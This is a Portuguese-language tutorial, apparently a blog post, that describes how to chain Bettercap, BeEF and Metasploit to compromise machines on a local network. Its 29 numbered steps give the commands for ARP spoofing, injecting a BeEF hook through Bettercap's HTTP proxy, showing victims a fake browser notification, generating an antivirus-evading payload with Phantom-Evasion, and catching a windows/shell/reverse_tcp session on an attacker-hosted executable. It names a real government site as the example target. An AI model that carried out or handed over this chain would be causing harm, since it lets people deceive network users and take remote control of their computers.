Bettercap + beef xss + payload = invólucro reverso

Muitos sistemas operacionais de pentest contam com inúmeras ferramentas. São tantas ferramentas que até ficamos perdidos e, nos perguntamos, qual a necessidade de haver várias ferramentas sendo algumas com quase a mesma funcionalidade?
As vezes é algo até sem necessidade mas, já tentou mesclar ou combinar alguma dessas ferramentas?
Então veja um exemplo que o nosso amigo BOOT SANTOS fez mesclando algumas ferramentas:
VÍDEO PRÁTICO
Agora vamos ao tutorial passo a passo?
Primeiramente vamos ver a funcionalidade dessas ferramentas?
BETTERCAP
O bettercap é um framework poderoso, facilmente extensível e portátil escrito em Go, que tem como objetivo oferecer aos pesquisadores de segurança, teamers vermelhos e engenheiros reversos uma solução fácil de usar , tudo-em-um com todos os recursos necessários para realizar reconhecimentos e ataques Redes WiFi , dispositivos Bluetooth Low Energy , dispositivos HID wireless e redes Ethernet .
Para instalar no Kali Linux digite: apt-get update && apt-get install bettercap
BEEF-XSS
BeEF é a abreviatura de The Browser Exploitation Framework. É uma ferramenta de teste de penetração focada no navegador da web. Em meio a crescentes preocupações sobre ataques pela Web contra clientes, incluindo clientes móveis, o BeEF permite que o testador de penetração profissional avalie a postura real de segurança de um ambiente de destino usando vetores de ataque do lado do cliente. Ao contrário de outras estruturas de segurança, o BeEF analisa o perímetro da rede e o sistema cliente, e examina a capacidade de exploração dentro do contexto de uma única porta aberta: o navegador da web. O BeEF conectará um ou mais navegadores da Web e os usará como cabeças de ponte para o lançamento de módulos de comando direcionados e outros ataques contra o sistema a partir do contexto do navegador.
Para instalar: git clone https://github.com/beefproject/beef
ARP SPOOFING
Em redes de computadores, ARP spoofing ou ARP cache poisoning é uma técnica em que um atacante envia mensagens ARP (Address Resolution Protocol) com o intuito de associar seu endereço MAC ao endereço IP de outro host, como por exemplo, o endereço IP do gateway padrão, fazendo com que todo o tráfego seja enviado para o endereço IP do atacante ao invés do endereço IP do gateway.
O ARP spoofing permite com que o atacante intercepte quadros trafegados na rede, modifique os quadros trafegados e até é capaz de parar todo o tráfego. Esse tipo de ataque só ocorre em segmentos da rede de área local (local area networks — LAN) que usam o ARP para fazer a resolução de endereços IP em endereços da camada de enlace.
Agora vamos a prática?
Primeiramente você irá necessitar de um código em javascript para fazer a injeção do beef com o bettercap

Após montar o código salve como desejar, no caso é costumeiro salvar como beef-inject.js, mas vai de cada um…
Agora vamos ao passo a passo
1.Execute o beef-xss
2. Acesse pelo browser o ip http://127.0.0.1:3000/ui/panel
3. Agora, execute o Bettercap
4. Digite: net.show (Verifica os endereços de IP, Mac Address e as máquinas conectadas na rede)
5. Crie um código para fazer a injeção do beef no bettercap como vimos acima
6. No bettercap digite: set http.proxy.script “Caminho do script beef-inject.js” (Ele injeta o beef-xss como um proxy)
7. Em seguida digite: http.proxy on (para ativar)
8. Depois digite: arp.spoof on (para fazer o spoofing na rede)
9. No exemplo foi usado o site: www.sisu.mec.gov.br
10. No beef vá em online browser e procure o site acima ou outro que a vítima estiver usando, clique em cima do alvo
11. Agora vá em “current browser” em “commands” depois, “Social Engineering”
12. Clique em “Fake notification bar (chrome) ou (Firefox) ou (IE)”
13. E, com isso, você pode mudar a mensagem de notificação e aplicar uma engenharia social
14. Agora, você baixa um script para fazer Evasão e bypass do AV na máquina da vitima, digite: git clone https://github.com/oddcod3/Phantom-Evasion (com ele vamos gerar nosso payload para evasão)
15. Com isso, digite o seguinte comando: python phantom-evasion.py
16. Após isso, aparecerá um menu e de lá você pode selecionar as opções que deseja para gerar um payload
17. Um exemplo de opções é: 1 (Windows Module), 1 (Shell code Injection), 3 (VirtualAlloc No directcall), Enter (Continue) e 1 (Msfvenom)
18. Agora, digite o ip da sua máquina atacante e a porta, e em seguida, jogue o payload gerado no /var/www/html
19. Após isso, ative o serviço do apache2 na sua máquina, comando: service apache2 start
20. Abra o msfconsole e digite: use exploit multi/handler
21. Em seguida, digite: set payload windows/shell/reverse_tcp
22. Dê um show options e configure o LHOST e o LPORT do payload sendo igual ao do payload gerado com Phantom-evasion
23. Volte no “Fake Notification bar” seja o que você estiver usando para atacar
24. Na URL, digite: IP DO ATACANTE/nomedopayload.exe

25. Depois de todo esse processo, digite: “Execute”
26. No msfconsole inicie a conexão, digitando: exploit
27. Irá aparecer um pop-up com uma notificação no site que a pessoa está navegando

28. Espera a pessoa instalar o plugin e executa-lo que, no caso, é o nosso payload
29. Pronto! Você consegue obter acesso a máquina da vitima.

Caso queira saber mais algumas funcionalidades das ferramentas, acesse: https://github.com/bettercap/bettercap/issues/290
https://github.com/oddcod3/Phantom-Evasion
https://www.bettercap.org/basic-usage/
CURTA AS PÁGINAS: